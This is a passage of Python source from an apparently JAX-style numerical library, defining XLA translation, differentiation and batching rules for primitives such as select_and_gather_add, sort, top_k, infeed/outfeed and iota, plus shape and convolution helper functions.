return _common_reduce_window_shape_rule(
operand, window_dimensions, window_strides, padding, base_dilation,
window_dilation)
_UINT_DTYPES = {
16: np.uint16,
32: np.uint32,
64: np.uint64,
}
_INT_DTYPES = {
16: np.int16,
32: np.int32,
64: np.int64,
}
def _select_and_gather_add_translation(
c, tangents, operand, *, select_prim, window_dimensions, window_strides,
padding, base_dilation, window_dilation, max_bits=64):
shape = c.get_shape(operand)
dtype = shape.numpy_dtype()
etype = shape.xla_element_type()
nbits = dtypes.finfo(dtype).bits
assert nbits <= max_bits
double_word_reduction = nbits * 2 <= max_bits
const = lambda c, dtype, x: xb.constant(c, np.array(x, dtype=dtype),
canonicalize_types=False)
if double_word_reduction:
# TODO(b/73062247): XLA doesn't yet implement ReduceWindow on tuples, so
# we implement a pair-wise ReduceWindow by packing two k-bit values into
# 2k-bit unsigned integer using bit tricks.
word_dtype = _UINT_DTYPES[nbits]
double_word_dtype = _UINT_DTYPES[nbits * 2]
word_type = xla_client.dtype_to_etype(word_dtype)
double_word_type = xla_client.dtype_to_etype(double_word_dtype)
# Packs two values into a tuple.
def pack(a, b):
a = xops.BitcastConvertType(a, word_type)
b = xops.BitcastConvertType(b, word_type)
a = xops.ConvertElementType(a, double_word_type)
b = xops.ConvertElementType(b, double_word_type)
a = xops.ShiftLeft(a, const(c, double_word_dtype, nbits))
return xops.Or(a, b)
# Unpacks the first element of a tuple.
def fst(c, t):
st = xops.ShiftRightLogical(t, const(c, double_word_dtype, nbits))
return xops.BitcastConvertType(xops.ConvertElementType(st, word_type), etype)
# Unpacks the second element of a tuple.
def snd(t):
return xops.BitcastConvertType(xops.ConvertElementType(t, word_type), etype)
else:
# The double-word trick above only works if we have a sufficiently large
# type. As an alternative, we can pack two half words into a single word,
# at the cost of precision.
# TODO(b/73062247): add support for tuple reductions and remove this case.
warnings.warn("Using reduced precision for gradient of reduce-window "
"min/max operator to work around missing XLA support for "
"pair-reductions. This is likely from a second or "
"higher derivative of a max-pooling operation.")
r_nbits = nbits // 2
# Drop/round the bottom mantissa bits.
nexp = dtypes.finfo(dtype).nexp
nmant = r_nbits - nexp - 1
double_word_dtype = word_dtype = _UINT_DTYPES[nbits]
word_type = xla_client.dtype_to_etype(word_dtype)
# Packs two values into a tuple.
def pack(a, b):
a = xops.ReducePrecision(a, exponent_bits=nexp, mantissa_bits=nmant)
b = xops.ReducePrecision(b, exponent_bits=nexp, mantissa_bits=nmant)
a = xops.BitcastConvertType(a, word_type)
b = xops.BitcastConvertType(b, word_type)
b = xops.ShiftRightLogical(b, const(c, word_dtype, r_nbits))
return xops.Or(a, b)
# Unpacks the first element of a tuple.
def fst(c, t):
st = xops.And(t, const(c, word_dtype, ((1 << r_nbits) - 1) << r_nbits))
return xops.BitcastConvertType(st, etype)
# Unpacks the second element of a tuple.
def snd(t):
return xops.BitcastConvertType(xops.ShiftLeft(t, const(c, word_dtype, r_nbits)),
etype)
def reducer():
c = xla_bridge.make_computation_builder("select_and_gather_pair_reducer")
x = xb.parameter(c, 0,
xla_client.Shape.array_shape(np.dtype(double_word_dtype), ()))
y = xb.parameter(c, 1,
xla_client.Shape.array_shape(np.dtype(double_word_dtype), ()))
assert select_prim is ge_p or select_prim is le_p
which = xops.Ge if select_prim is ge_p else xops.Le
xops.Select(which(fst(c, x), fst(c, y)), x, y)
return c.build()
assert select_prim is ge_p or select_prim is le_p, select_prim
init = -np.inf if select_prim is ge_p else np.inf
out = xops.ReduceWindowWithGeneralPadding(
pack(operand, tangents), pack(const(c, dtype, init), const(c, dtype, 0)),
reducer(), window_dimensions, window_strides, base_dilation,
window_dilation, padding)
return snd(out)
def _select_and_gather_add_jvp(
primals, tangents, *, select_prim, window_dimensions, window_strides,
padding, base_dilation, window_dilation):
source, operand = primals
g_source, g_operand = tangents
val_out = _select_and_gather_add(
source, operand, select_prim, window_dimensions, window_strides,
padding, base_dilation, window_dilation)
del g_operand
if type(g_source) is ad_util.Zero:
tangent_out = ad_util.Zero.from_value(val_out)
else:
tangent_out = _select_and_gather_add(
g_source, operand, select_prim, window_dimensions,
window_strides, padding, base_dilation, window_dilation)
return val_out, tangent_out
def _select_and_gather_add_transpose(
t, tangents, operand, *, select_prim, window_dimensions, window_strides,
padding, base_dilation, window_dilation):
assert select_prim in (le_p, ge_p)
assert ad.is_undefined_primal(tangents) and not ad.is_undefined_primal(operand)
if any(d != 1 for d in window_dilation):
msg = ("VJP not implemented for select_and_gather (MaxPool) with window "
"dilation, got window_dilation={}.")
raise NotImplementedError(msg.format(window_dilation))
if type(t) is ad_util.Zero:
return [ad_util.Zero(tangents.aval), None]
has_base_dilation = any(d != 1 for d in base_dilation)
if has_base_dilation:
select_identity = (_get_max_identity if select_prim is ge_p
else _get_min_identity)
operand = pad(operand, select_identity(operand.dtype),
tuple((0, 0, d - 1) for d in base_dilation))
result = _select_and_scatter_add(t, operand, select_prim, window_dimensions,
window_strides, padding)
if has_base_dilation:
result = slice(operand, (0,) * len(operand.shape), operand.shape,
base_dilation)
return [result, None]
def _select_and_gather_add_batching_rule(
batched_args, batch_dims, *, select_prim, window_dimensions, window_strides,
padding, base_dilation, window_dilation):
t, x = batched_args
t_bdim, x_bdim = batch_dims
size = next(a.shape[bdim] for a, bdim in zip(batched_args, batch_dims)
if bdim is not None)
t = batching.bdim_at_front(t, t_bdim, size)
x = batching.bdim_at_front(x, x_bdim, size)
window_dimensions = (1,) + window_dimensions
window_strides = (1,) + window_strides
padding = ((0, 0),) + padding
base_dilation = (1,) + base_dilation
window_dilation = (1,) + window_dilation
out = _select_and_gather_add(t, x, select_prim, window_dimensions,
window_strides, padding, base_dilation,
window_dilation)
return (out, 0)
select_and_gather_add_p = standard_primitive(
_select_and_gather_add_shape_rule, _input_dtype, 'select_and_gather_add',
_select_and_gather_add_translation)
ad.primitive_jvps[select_and_gather_add_p] = _select_and_gather_add_jvp
ad.primitive_transposes[select_and_gather_add_p] = \
_select_and_gather_add_transpose
batching.primitive_batchers[select_and_gather_add_p] = \
_select_and_gather_add_batching_rule
xla.backend_specific_translations['tpu'][select_and_gather_add_p] = partial(
_select_and_gather_add_translation,
max_bits=32)
def _sort_abstract_eval(*args, **kwargs):
args = tuple(raise_to_shaped(arg) for arg in args)
if any(arg.shape != args[0].shape for arg in args[1:]):
shapes = " ".join(str(a.shape) for a in args)
raise TypeError(f"Arguments to sort must have equal shapes, got: {shapes}")
return args
def _float_to_int_for_sort(x):
# Switch from a floating point value to a integer value in such a way that
# when using the integer value to compare, we get the same result for normal
# values, and -nan is treated as the smallest value, and nan is treated as
# the largest value.
# If f is a float, and
# x = bit_cast<int32>(f);
# y = x < 0 ? int32_max - x : x;
# then y is ordered as an int32 such that finite values have the obvious
# order, -0 is ordered before 0, and -NaN and NaN appear at the beginning
# and end of the ordering.
# Note that in order to avoid -x to overflow, we calculate
# int32_max - x as unsigned, and then convert back to signed.
if x.dtype == dtypes.bfloat16:
x = convert_element_type(x, np.float32)
nbits = np.finfo(x).bits
signed_dtype = _INT_DTYPES[nbits]
unsigned_dtype = _UINT_DTYPES[nbits]
signed = bitcast_convert_type(x, signed_dtype)
unsigned = bitcast_convert_type(x, unsigned_dtype)
flipped = bitcast_convert_type(
sub(unsigned_dtype(np.iinfo(signed_dtype).max), unsigned), signed_dtype)
return select(lt(signed, _zero(signed)), flipped, signed)
# Default comparator that sorts the operands lexicographically on the
# first `num_keys` arguments.
# For floating point types, a total order is created where
# -NaN < -infinity < ... < -0 < 0 < ... < infinity < NaN.
# For complex types, the (real, imag) pairs are sorted lexicographically
# (following NumPy's semantics).
# This code adds complex-number support and lexicographic ordering to the algorithm from:
# https://github.com/tensorflow/tensorflow/blob/ba43780830f09da72081fe5061c436f1c6203a92/tensorflow/compiler/xla/client/lib/comparators.h#L33
def _sort_lt_comparator(*operands, num_keys=1):
assert len(operands) >= 2 and len(operands) % 2 == 0, operands
assert len(operands) // 2 >= num_keys, (operands, num_keys)
x_keys, y_keys = [], []
for x, y in zip(operands[:2*num_keys:2], operands[1:2*num_keys:2]):
assert x.dtype == y.dtype, (x.dtype, y.dtype)
if np.issubdtype(x.dtype, np.complexfloating):
x_keys.extend([_float_to_int_for_sort(real(x)), _float_to_int_for_sort(imag(x))])
y_keys.extend([_float_to_int_for_sort(real(y)), _float_to_int_for_sort(imag(y))])
elif np.issubdtype(x.dtype, np.floating):
x_keys.append(_float_to_int_for_sort(x))
y_keys.append(_float_to_int_for_sort(y))
else:
x_keys.append(x)
y_keys.append(y)
p = None
for xk, yk in zip(x_keys[::-1], y_keys[::-1]):
p = (bitwise_or(lt(xk, yk), bitwise_and(eq(xk, yk), p)) if p is not None
else lt(xk, yk))
return p
def _sort_translation_rule(c, *operands, dimension, is_stable, num_keys):
types = [c.get_shape(x).xla_element_type() for x in operands]
subc = xla_bridge.make_computation_builder("sort_lt_comparator")
params = [xb.parameter(subc, 2 * i + j, xc.Shape.array_shape(typ, ()))
for i, typ in enumerate(types) for j in range(2)]
result = xla.lower_fun(partial(_sort_lt_comparator, num_keys=num_keys),
multiple_results=False)(subc, *params)
comparator = subc.build(result)
out = xops.Sort(c, operands, dimension=dimension, is_stable=is_stable,
comparator=comparator)
return out if len(operands) != 1 else xops.Tuple(c, [out])
def _sort_jvp(primals, tangents, *, dimension, is_stable, num_keys):
shape = primals[0].shape
iotas = []
for dim, size in enumerate(shape):
dtype = np.int32 if size < np.iinfo(np.int32).max else np.int64
iotas.append(broadcasted_iota(dtype, shape, dim))
primals = sort_p.bind(*(primals + (iotas[dimension],)), dimension=dimension,
is_stable=is_stable, num_keys=num_keys)
idx = tuple(primals[-1] if i == dimension else iotas[i]
for i in range(len(shape)))
tangents_out = tuple(t if type(t) is ad_util.Zero else t[idx] for t in tangents)
return tuple(primals[:-1]), tangents_out
def _sort_batch_rule(batched_args, batch_dims, *, dimension, is_stable, num_keys):
prototype_arg, new_bdim = next(
(a, b) for a, b in zip(batched_args, batch_dims) if b is not None)
new_args = []
for arg, bdim in zip(batched_args, batch_dims):
if bdim is None:
dims = np.delete(np.arange(prototype_arg.ndim), new_bdim)
new_args.append(broadcast_in_dim(arg, prototype_arg.shape, dims))
else:
new_args.append(batching.moveaxis(arg, bdim, new_bdim))
new_dimension = dimension + (new_bdim <= dimension)
bdims = (new_bdim,) * len(new_args)
return (sort_p.bind(*new_args, dimension=new_dimension, is_stable=is_stable, num_keys=num_keys),
bdims)
sort_p = Primitive('sort')
sort_p.multiple_results = True
sort_p.def_impl(partial(xla.apply_primitive, sort_p))
sort_p.def_abstract_eval(_sort_abstract_eval)
xla.translations[sort_p] = _sort_translation_rule
ad.primitive_jvps[sort_p] = _sort_jvp
batching.primitive_batchers[sort_p] = _sort_batch_rule
def _top_k_abstract_eval(operand, *, k):
if k < 0:
raise ValueError("k argument to top_k must be nonnegative, got {}".format(k))
if len(operand.shape) == 0:
raise TypeError("top_k operand must have >= 1 dimension, got {}"
.format(operand.shape))
shape = list(operand.shape)
if shape[-1] < k:
msg = "k argument to top_k must be no larger than minor dimension; {} vs {}"
raise ValueError(msg.format(k, shape))
shape[-1] = k
return (operand.update(shape=shape, dtype=operand.dtype, weak_type=operand.weak_type),
operand.update(shape=shape, dtype=np.dtype(np.int32)))
def _top_k_jvp(primals, tangents, *, k):
operand, = primals
tangent, = tangents
primals_out = top_k(operand, k)
if type(tangent) is ad_util.Zero:
tangent_out = ad_util.Zero.from_value(primals_out[0])
else:
_, k_idxs = primals_out
idx_shape = k_idxs.shape
rank = len(idx_shape)
gather_index_shape = idx_shape + (1,)
gather_indices = []
for i in range(rank-1):
_iota = iota(k_idxs.dtype, idx_shape[i])
if not config.omnistaging_enabled:
_iota = tie_in(operand, _iota)
_iota = broadcast_in_dim(_iota, gather_index_shape, (i,))
gather_indices.append(_iota)
gather_indices.append(reshape(k_idxs, gather_index_shape))
gather_indices = concatenate(gather_indices, dimension=rank)
slice_sizes = (1,) * rank
dnums = GatherDimensionNumbers(
offset_dims=(),
collapsed_slice_dims=tuple(range(rank)),
start_index_map=tuple(range(rank)))
tangent_out = gather(tangent, gather_indices, dnums, slice_sizes)
return primals_out, (tangent_out, ad_util.Zero.from_value(primals_out[1]))
def _top_k_batch_rule(batched_args, batch_dims, *, k):
operand, = batched_args
bdim, = batch_dims
if bdim == operand.ndim-1:
perm = np.arange(operand.ndim)
perm[bdim-1], perm[bdim] = perm[bdim], perm[bdim-1]
top_k_v, top_k_i = top_k(transpose(operand, perm), k=k)
return (transpose(top_k_v, perm),
transpose(top_k_i, perm)), (bdim, bdim)
else:
return top_k(operand, k=k), (bdim, bdim)
top_k_p = Primitive('top_k')
top_k_p.multiple_results = True
top_k_p.def_impl(partial(xla.apply_primitive, top_k_p))
top_k_p.def_abstract_eval(_top_k_abstract_eval)
xla.translations[top_k_p] = partial(standard_translate, 'top_k')
ad.primitive_jvps[top_k_p] = _top_k_jvp
batching.primitive_batchers[top_k_p] = _top_k_batch_rule
def _stop_gradient_jvp_rule(primals, tangents):
# if we don't call stop_gradient here, we'd only peel off one autodiff tracer
x, = primals
return stop_gradient(x), ad_util.Zero.from_value(x)
def _stop_gradient_batch_rule(batched_args, batch_dims):
x, = batched_args
dim, = batch_dims
return stop_gradient(x), dim
ad.primitive_jvps[ad_util.stop_gradient_p] = _stop_gradient_jvp_rule
batching.primitive_batchers[ad_util.stop_gradient_p] = _stop_gradient_batch_rule
def create_token(_=None):
"""Creates an XLA token value with no preconditions for sequencing effects.
Experimental.
The argument is ignored. It exists for backward compatibility.
"""
if config.omnistaging_enabled:
return create_token_p.bind()
else:
x = _
if x is None:
raise ValueError(
'create_token needs a tie-in operand unless omnistaging is enabled.')
return create_token_p.bind(stop_gradient(x))
create_token_p = Primitive("create_token")
create_token_p.def_impl(partial(xla.apply_primitive, create_token_p))
create_token_p.def_abstract_eval(lambda *_: abstract_token)
xla.translations[create_token_p] = lambda c, *_: xops.CreateToken(c)
def after_all(*operands):
"""Merges one or more XLA token values. Experimental.
Wraps the XLA AfterAll operator."""
return after_all_p.bind(*operands)
def _after_all_abstract_eval(*operands):
if any(x is not abstract_token for x in operands):
raise TypeError("Arguments to after_all must be tokens")
return abstract_token
def _after_all_translation_rule(c, *operands):
return xops.AfterAll(c, operands)
after_all_p = Primitive("after_all")
after_all_p.def_impl(partial(xla.apply_primitive, after_all_p))
after_all_p.def_abstract_eval(_after_all_abstract_eval)
xla.translations[after_all_p] = _after_all_translation_rule
def infeed(token, shape=None, partitions=None):
"""Consumes an infeed value of `shape` from the host. Experimental.
`token` is used to sequence infeed and outfeed effects.
`partitions` may be specified inside a `sharded_jit` function.
"""
flat_shapes, treedef = pytree.flatten(shape)
for shape in flat_shapes:
if not isinstance(shape, ShapedArray):
raise TypeError("shape argument to infeed must be a pytree of "
"ShapedArray values, got {}".format(shape))
if partitions is not None:
# Always replicate token.
# We specifically use type() to raise an error for PartitionSpecs.
if type(partitions) != tuple: # pylint: disable=unidiomatic-typecheck
raise ValueError(f"'partitions' argument to infeed should be a tuple, "
f"got {partitions}")
partitions = partitions + (None,)
xs_and_token = infeed_p.bind(token, shapes=tuple(flat_shapes),
partitions=partitions)
return (treedef.unflatten(xs_and_token[:-1]), xs_and_token[-1])
def _infeed_abstract_eval(token, *, shapes, partitions):
if token is not abstract_token:
raise TypeError("First argument to infeed must be a token")
return shapes + (abstract_token,)
def _infeed_translation_rule(c, token, *, shapes, partitions):
shape = tuple(shape.with_major_to_minor_layout_if_absent()
for x in shapes for shape in xla.aval_to_xla_shapes(x))
build_infeed = partial(xops.InfeedWithToken, token,
xla_client.Shape.tuple_shape(shape))
if partitions:
xs_and_token = xb.with_sharding(c, partitions, build_infeed)
else:
# Note that infeed will default to replication if inside a sharded
# computation and no sharding is specified.
xs_and_token = build_infeed()
xs = xops.GetTupleElement(xs_and_token, 0)
token = xops.GetTupleElement(xs_and_token, 1)
outs = [xops.GetTupleElement(xs, i) for i in range(len(shapes))] + [token]
return xops.Tuple(c, outs)
infeed_p = Primitive("infeed")
infeed_p.multiple_results = True
infeed_p.def_impl(partial(xla.apply_primitive, infeed_p))
infeed_p.def_abstract_eval(_infeed_abstract_eval)
xla.translations[infeed_p] = _infeed_translation_rule
def outfeed(token, xs):
"""Outfeeds value `xs` to the host. Experimental.
`token` is used to sequence infeed and outfeed effects.
"""
flat_xs, _ = pytree.flatten(xs)
return outfeed_p.bind(token, *flat_xs)
def _outfeed_abstract_eval(token, *xs):
if token is not abstract_token:
raise TypeError("First argument to outfeed must be a token")
return abstract_token
def _outfeed_translation_rule(c, token, *xs):
t = xops.Tuple(c, xs)
return xops.OutfeedWithToken(t, token, c.get_shape(t))
outfeed_p = Primitive("outfeed")
outfeed_p.def_impl(partial(xla.apply_primitive, outfeed_p))
outfeed_p.def_abstract_eval(_outfeed_abstract_eval)
xla.translations[outfeed_p] = _outfeed_translation_rule
def rng_uniform(a, b, shape):
"""Stateful PRNG generator. Experimental and its use is discouraged.
Returns uniformly distributed random numbers in the range [a, b)
You should use jax.random for most purposes; this function exists only for
niche use cases with special performance requirements.
This API may be removed at any time.
"""
return rng_uniform_p.bind(a, b, shape=tuple(shape))
def _rng_uniform_abstract_eval(a, b, *, shape):
if a.dtype != b.dtype:
raise ValueError(
"Arguments to rng_uniform must have identical dtypes, got {} "
"and {}.".format(a.dtype, b.dtype))
if a.shape != () or b.shape != ():
raise ValueError(
"Arguments to rng_uniform must be scalars; got shapes {} and {}."
.format(a.shape, b.shape))
return a.update(shape=shape, dtype=a.dtype, weak_type=(a.weak_type and b.weak_type))
def _rng_uniform_translation_rule(c, a, b, *, shape):
xla_shape = xc.Shape.array_shape(c.get_shape(a).xla_element_type(), shape)
return xops.RngUniform(a, b, xla_shape)
rng_uniform_p = Primitive("rng_uniform")
rng_uniform_p.def_impl(partial(xla.apply_primitive, rng_uniform_p))
rng_uniform_p.def_abstract_eval(_rng_uniform_abstract_eval)
xla.translations[rng_uniform_p] = _rng_uniform_translation_rule
def _iota_abstract_eval(*, dtype, shape, dimension):
_check_shapelike("iota", "shape", shape)
if not any(dtypes.issubdtype(dtype, t) for t in _num):
msg = 'iota does not accept dtype {}. Accepted dtypes are subtypes of {}.'
typename = str(np.dtype(dtype).name)
accepted_typenames = (t.__name__ for t in _num)
raise TypeError(msg.format(typename, ', '.join(accepted_typenames)))
if not 0 <= dimension < len(shape):
raise ValueError("iota dimension must be between 0 and len(shape), got "
f"dimension={dimension} for shape {shape}")
return ShapedArray(shape, dtype)
def _iota_translation_rule(c, dtype, shape, dimension):
etype = xla_client.dtype_to_etype(dtype)
xla_shape = xc.Shape.array_shape(etype, shape)
return xops.Iota(c, xla_shape, dimension)
iota_p = Primitive('iota')
iota_p.def_impl(partial(xla.apply_primitive, iota_p))
iota_p.def_abstract_eval(_iota_abstract_eval)
xla.translations[iota_p] = _iota_translation_rule
### util
_ndim = np.ndim
def _dilate_shape(shape, dilation):
"""Utility function for computing the shape resulting from a dilation."""
if not np.all(np.greater(dilation, 0)):
msg = "All dilations must be positive, got {}."
raise TypeError(msg.format(dilation))
dilation = (1,) * (len(shape) - len(dilation)) + tuple(dilation)
return np.where(shape == 0, 0,
np.multiply(dilation, np.subtract(shape, 1)) + 1)
def _ceil_divide(x1, x2):
return -np.floor_divide(np.negative(x1), x2)
def padtype_to_pads(in_shape, window_shape, window_strides, padding):
"""Convert padding string to list of pairs of pad values."""
PaddingType = xla_client.PaddingType
if isinstance(padding, str):
mapping = {'VALID': PaddingType.VALID, 'SAME': PaddingType.SAME}
try:
padding = mapping[padding.upper()]
except KeyError as err:
msg = "Unrecognized padding type: expected 'VALID' or 'SAME', got {}."
raise RuntimeError(msg.format(padding)) from err
if padding == PaddingType.SAME:
out_shape = _ceil_divide(in_shape, window_strides)
pad_sizes = np.maximum(0, (out_shape - 1) * window_strides +
window_shape - in_shape)
return [(pad_size // 2, pad_size - pad_size // 2) for pad_size in pad_sizes]
elif padding == PaddingType.VALID:
return [(0, 0)] * len(in_shape)
else:
msg = "Unknown padding type: {}."
raise TypeError(msg.format(padding))
def _check_same_dtypes(name, ignore_fp_precision, *ttypes):
"""Check that dtypes agree, possibly ignoring float precision."""
# the `ignore_fp_precision` flag exists because the XLA shape inference logic
# allows mixed floating point precision, but the HLO verifier often rejects it
types = list(map(np.dtype, ttypes)) # canonicalize
if ignore_fp_precision:
types = [
np.floating if dtypes.issubdtype(dtype, np.floating)
else np.complexfloating if dtypes.issubdtype(dtype, np.complexfloating)
else dtype for dtype in types]
if len({dtypes.canonicalize_dtype(t) for t in types}) != 1:
if ignore_fp_precision:
msg = ("{} requires arguments to have same dtypes up to floating point "
"precision, got {}.")
else:
msg = "{} requires arguments to have the same dtypes, got {}."
raise TypeError(msg.format(name, ", ".join(map(str, types))))
def _check_conv_shapes(name, lhs_shape, rhs_shape, window_strides):
"""Check that conv shapes are valid and are consistent with window_strides."""
if len(lhs_shape) != len(rhs_shape):
msg = "Arguments to {} must have same rank, got {} and {}."
raise TypeError(msg.format(name, len(lhs_shape), len(rhs_shape)))
if len(lhs_shape) < 2:
msg = "Arguments to {} must have rank at least 2, got {} and {}."
raise TypeError(msg.format(name, len(lhs_shape), len(rhs_shape)))
if lhs_shape[1] != rhs_shape[1]:
msg = "Arguments to {} must agree on input feature size, got {} and {}."
raise TypeError(msg.format(name, lhs_shape[1], rhs_shape[1]))
_check_shapelike(name, "window_strides", window_strides)
if not np.all(np.greater(window_strides, 0)):
msg = "All elements of window_strides must be positive, got {}."
raise TypeError(msg.format(window_strides))
if len(window_strides) != len(lhs_shape) - 2:
msg = "{} window_strides has wrong length: expected {}, got {}."
expected_length = len(lhs_shape) - 2
raise TypeError(msg.format(name, expected_length, len(window_strides)))
def conv_shape_tuple(lhs_shape, rhs_shape, strides, pads, batch_group_count=1):
"""Compute the shape tuple of a conv given input shapes in canonical order."""
if isinstance(pads, str):
pads = padtype_to_pads(lhs_shape[2:], rhs_shape[2:], strides, pads)
if len(pads) != len(lhs_shape) - 2:
msg = "Wrong number of explicit pads for convolution: expected {}, got {}."
raise TypeError(msg.format(len(lhs_shape) - 2, len(pads)))
lhs_padded = np.add(lhs_shape[2:], np.sum(np.array(pads).reshape(-1, 2),
axis=1))
out_space = np.floor_divide(
np.subtract(lhs_padded, rhs_shape[2:]), strides) + 1
out_space = np.maximum(0, out_space)
assert lhs_shape[0] % batch_group_count == 0
out_shape = (lhs_shape[0] // batch_group_count, rhs_shape[0])
return tuple(out_shape + tuple(out_space))
def conv_general_shape_tuple(lhs_shape, rhs_shape, window_strides, padding,
dimension_numbers):
lhs_perm, rhs_perm, out_perm = conv_general_permutations(dimension_numbers)
lhs_trans = np.take(lhs_shape, lhs_perm)
rhs_trans = np.take(rhs_shape, rhs_perm)
out_trans = conv_shape_tuple(lhs_trans, rhs_trans, window_strides, padding)
return tuple(np.take(out_trans, np.argsort(out_perm)))
def conv_transpose_shape_tuple(lhs_shape, rhs_shape, window_strides, padding,
dimension_numbers):
lhs_perm, rhs_perm, out_perm = conv_general_permutations(dimension_numbers)
lhs_trans = np.take(lhs_shape, lhs_perm)
rhs_trans = np.take(rhs_shape, rhs_perm)
if isinstance(padding, str):
padding = [_conv_transpose_padding(k, s, padding)
for k,s in zip(rhs_trans[2:], window_strides)]
padding = list(map(np.sum, padding))
unpad_out_space = [(i-1) * s - k + 2
for i, k, s in zip(lhs_trans[2:],
rhs_trans[2:],
window_strides)]
out_space = np.sum([unpad_out_space, padding], axis=0).tolist()
out_trans = tuple((lhs_trans[0], rhs_trans[0]) + tuple(out_space))
return tuple(np.take(out_trans, np.argsort(out_perm)))
def _check_shapelike(fun_name, arg_name, obj, non_zero_shape=False):
"""Check that `obj` is a shape-like value (e.g. tuple of nonnegative ints)."""
if not isinstance(obj, (tuple, list, np.ndarray)):
msg = "{} {} must be of type tuple/list/ndarray, got {}."
raise TypeError(msg.format(fun_name, arg_name, type(obj)))
# bool(obj) for an ndarray raises an error, so we check len
if not len(obj): # pylint: disable=g-explicit-length-test
return
obj_arr = np.array(obj)
if obj_arr.ndim != 1:
msg = "{} {} must be rank 1, got {}."
raise TypeError(msg.format(obj_arr.ndim))
try:
canonicalize_shape(obj_arr)
except TypeError as err:
msg = "{} {} must have every element be an integer type, got {}."
raise TypeError(msg.format(fun_name, arg_name, tuple(map(type, obj)))) from err
lower_bound, bound_error = (
(1, "strictly positive") if non_zero_shape else (0, "nonnegative"))
if not (obj_arr >= lower_bound).all():
msg = "{} {} must have every element be {}, got {}."
raise TypeError(msg.format(fun_name, arg_name, bound_error, obj))
def _dynamic_slice_indices(operand, start_indices):
if len(start_indices) != operand.ndim:
msg = ("Length of slice indices must match number of operand dimensions ({} "
"vs {})")
raise ValueError(msg.format(len(start_indices), operand.shape))
# map int over operand.shape to raise any dynamic-shape errors
safe_map(int, operand.shape)
if not isinstance(start_indices, (tuple, list)):
if start_indices.ndim != 1:
raise ValueError("Slice indices must be a 1D sequence, got {}"
.format(start_indices.shape))
return select(lt(start_indices, _zeros(start_indices)),
add(start_indices, _const(start_indices, operand.shape)),
start_indices)
else:
return [np.asarray(i + d if i < 0 else i, getattr(i, 'dtype', dtypes.int_))
if isinstance(i, (int, np.integer))
else select(lt(i, _const(i, 0)), add(i, _const(i, d)), i)
for i, d in zip(start_indices, operand.shape)]
def _const(example, val):
if dtypes.is_python_scalar(example):
return dtypes.scalar_type_of(example)(val)
return np.array(val, _dtype(example))
_zeros: Callable = partial(full_like, fill_value=0)
_zero: Callable = partial(full_like, shape=(), fill_value=0)
_ones: Callable = partial(full_like, fill_value=1)
_one: Callable = partial(full_like, shape=(), fill_value=1)
_twos: Callable = partial(full_like, fill_value=2)
_two: Callable = partial(full_like, shape=(), fill_value=2)
dtype: Callable = dtypes.result_type
_dtype: Callable = dtypes.result_type
def _iscomplex(x) -> bool:
return dtypes.issubdtype(_dtype(x), np.complexfloating)
def ranges_like(*xs):
start = 0
for x in xs:
x_len = len(x)
yield range(start, start + x_len)
start += x_len
def remaining(original, *removed_lists):
removed = set(itertools.chain(*removed_lists))
return [i for i in original if i not in removed]
def _canonicalize_precision(precision):
if precision is None:
return None
if isinstance(precision, Precision) or (
isinstance(precision, tuple)
and len(precision) == 2
and all(isinstance(p, Precision) for p in precision)
):
return precision
else:
raise ValueError("Precision argument must be None, a lax.Precision value "
f"or a tuple of two lax.Precision values; got {precision}")
def conv_dimension_numbers(lhs_shape, rhs_shape, dimension_numbers
) -> ConvDimensionNumbers:
"""Converts convolution `dimension_numbers` to a `ConvDimensionNumbers`.
Args:
lhs_shape: tuple of nonnegative integers, shape of the convolution input.
rhs_shape: tuple of nonnegative integers, shape of the convolution kernel.
dimension_numbers: None or a tuple/list of strings or a ConvDimensionNumbers
object following the convolution dimension number specification format in
xla_client.py.
Returns:
A `ConvDimensionNumbers` object that represents `dimension_numbers` in the
canonical form used by lax functions.
"""
if isinstance(dimension_numbers, ConvDimensionNumbers):
return dimension_numbers
if len(lhs_shape) != len(rhs_shape):
msg = "convolution requires lhs and rhs ndim to be equal, got {} and {}."
raise TypeError(msg.format(len(lhs_shape), len(rhs_shape)))
if dimension_numbers is None:
iota = tuple(range(len(lhs_shape)))
return ConvDimensionNumbers(iota, iota, iota)
elif isinstance(dimension_numbers, (list, tuple)):
if len(dimension_numbers) != 3:
msg = "convolution dimension_numbers list/tuple must be length 3, got {}."
raise TypeError(msg.format(len(dimension_numbers)))
if not all(isinstance(elt, str) for elt in dimension_numbers):
msg = "convolution dimension_numbers elements must be strings, got {}."
raise TypeError(msg.format(tuple(map(type, dimension_numbers))))
msg = ("convolution dimension_numbers[{}] must have len equal to the ndim "
"of lhs and rhs, got {} for lhs and rhs shapes {} and {}.")
for i, elt in enumerate(dimension_numbers):
if len(elt) != len(lhs_shape):
raise TypeError(msg.format(i, len(elt), lhs_shape, rhs_shape))
lhs_spec, rhs_spec, out_spec = conv_general_permutations(dimension_numbers)
return ConvDimensionNumbers(lhs_spec, rhs_spec, out_spec)
else:
msg = "convolution dimension_numbers must be tuple/list or None, got {}."
raise TypeError(msg.format(type(dimension_numbers)))
def conv_general_permutations(dimension_numbers):
"""Utility for convolution dimension permutations relative to Conv HLO."""
lhs_spec, rhs_spec, out_spec = dimension_numbers
lhs_char, rhs_char, out_char = charpairs = ("N", "C"), ("O", "I"), ("N", "C")
for i, (a, b) in enumerate(charpairs):
if not dimension_numbers[i].count(a) == dimension_numbers[i].count(b) == 1:
msg = ("convolution dimension_numbers[{}] must contain the characters "
"'{}' and '{}' exactly once, got {}.")
raise TypeError(msg.format(i, a, b, dimension_numbers[i]))
if len(dimension_numbers[i]) != len(set(dimension_numbers[i])):
msg = ("convolution dimension_numbers[{}] cannot have duplicate "
"characters, got {}.")
raise TypeError(msg.format(i, dimension_numbers[i]))
if not (set(lhs_spec) - set(lhs_char) == set(rhs_spec) - set(rhs_char) ==
set(out_spec) - set(out_char)):
msg = ("convolution dimension_numbers elements must each have the same "
"set of spatial characters, got {}.")
raise TypeError(msg.format(dimension_numbers))
def getperm(spec, charpair):
spatial = (i for i, c in enumerate(spec) if c not in charpair)
if spec is not rhs_spec:
spatial = sorted(spatial, key=lambda i: rhs_spec.index(spec[i]))
return (spec.index(charpair[0]), spec.index(charpair[1])) + tuple(spatial)
lhs_perm, rhs_perm, out_perm = map(getperm, dimension_numbers, charpairs)
return lhs_perm, rhs_perm, out_perm
def _conv_general_proto(dimension_numbers):
assert type(dimension_numbers) is ConvDimensionNumbers
lhs_spec, rhs_spec, out_spec = dimension_numbers
proto = xla_client.ConvolutionDimensionNumbers()
proto.input_batch_dimension = lhs_spec[0]
proto.input_feature_dimension = lhs_spec[1]
proto.output_batch_dimension = out_spec[0]
proto.output_feature_dimension = out_spec[1]
